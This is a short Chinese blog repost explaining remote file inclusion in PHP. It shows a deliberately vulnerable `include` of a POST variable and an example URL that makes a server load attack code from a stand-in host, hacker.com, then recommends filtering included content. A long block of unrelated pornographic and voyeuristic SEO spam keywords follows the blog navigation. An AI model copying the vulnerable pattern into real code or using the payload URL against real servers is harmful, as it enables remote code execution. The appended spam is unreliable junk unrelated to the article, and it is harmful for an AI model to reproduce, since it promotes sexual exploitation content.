• <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>

            小默

            【轉】WEB安全系列之三:執行惡意腳本

                * 惡意代碼執行攻擊利用的重點是web開發中引用變量做為程序執行的一部分代碼
                * 惡意代碼執行攻擊的技術重點在于讓服務器執行了惡意代碼,從而完成入侵或數據盜取等行為
                * 惡意代碼執行攻擊的方法重點在于Web開發中,對變量的引用的幾個關鍵部位沒有細化處理


               本文主要介紹惡意代碼執行攻擊的過程而不是技術細節。
            先看一段php代碼的例子:

            $report = $_POST['file']; //定義report變量某個表單變量
            include $report;          //在代碼中包含此變量

            如果攻擊者巧妙的利用這個漏洞,就可以令被攻擊服務器執行自己的惡意程序,類似的語法:
            http://www.tester.com/index.php?file=http://www.hacker.com/attack.php

            這時,程序就會讀取惡意的attack.php并引入到index.php中做為執行的一個部分!

            此類攻擊對于腳本類網頁代碼最有效。

            在編寫代碼時,尤其是利用以下的函數引用代碼片段時:
            PHP:include(), include_once(), require(), require_once(), fopen(), readfile(), ...
            JSP/Servlet:java.io.File(), java.io.FileReader(), ...
            ASP:include file, include virtual, ...
            應該對所引用的內容做安全的過濾!

            posted on 2010-04-14 14:24 小默 閱讀(598) 評論(0)  編輯 收藏 引用 所屬分類: Security

            導航

            統計

            留言簿(13)

            隨筆分類(287)

            隨筆檔案(289)

            漏洞

            搜索

            積分與排名

            最新評論

            閱讀排行榜

            深夜久久AAAAA级毛片免费看| 精品国产一区二区三区久久| 亚洲国产综合久久天堂| 中文字幕久久亚洲一区| 久久久av波多野一区二区| 91精品国产综合久久四虎久久无码一级| 久久97久久97精品免视看| 99久久综合国产精品免费| 久久福利青草精品资源站免费| 精品久久久久久无码人妻蜜桃| 伊人久久精品无码av一区| 99久久国产综合精品网成人影院| 久久久无码精品亚洲日韩京东传媒| 国产亚洲综合久久系列| 久久亚洲色一区二区三区| 99国产欧美精品久久久蜜芽| 久久精品国产欧美日韩99热| 超级碰久久免费公开视频| 久久久久久久久无码精品亚洲日韩 | 久久精品国产只有精品2020| 亚洲人成无码网站久久99热国产| 久久97精品久久久久久久不卡| 狠狠精品久久久无码中文字幕 | 青青青伊人色综合久久| 热re99久久6国产精品免费| 中文字幕久久精品 | 一本色综合久久| 久久夜色精品国产| 观看 国产综合久久久久鬼色 欧美 亚洲 一区二区 | 久久伊人精品一区二区三区| 青青青青久久精品国产h久久精品五福影院1421 | 色综合色天天久久婷婷基地| 婷婷综合久久中文字幕蜜桃三电影 | 久久国产精品99久久久久久老狼| 久久偷看各类wc女厕嘘嘘| 亚洲国产精品无码久久98| 久久久久久毛片免费播放| 99热成人精品热久久669| 久久久久久无码Av成人影院| 狠色狠色狠狠色综合久久| 亚洲综合精品香蕉久久网97|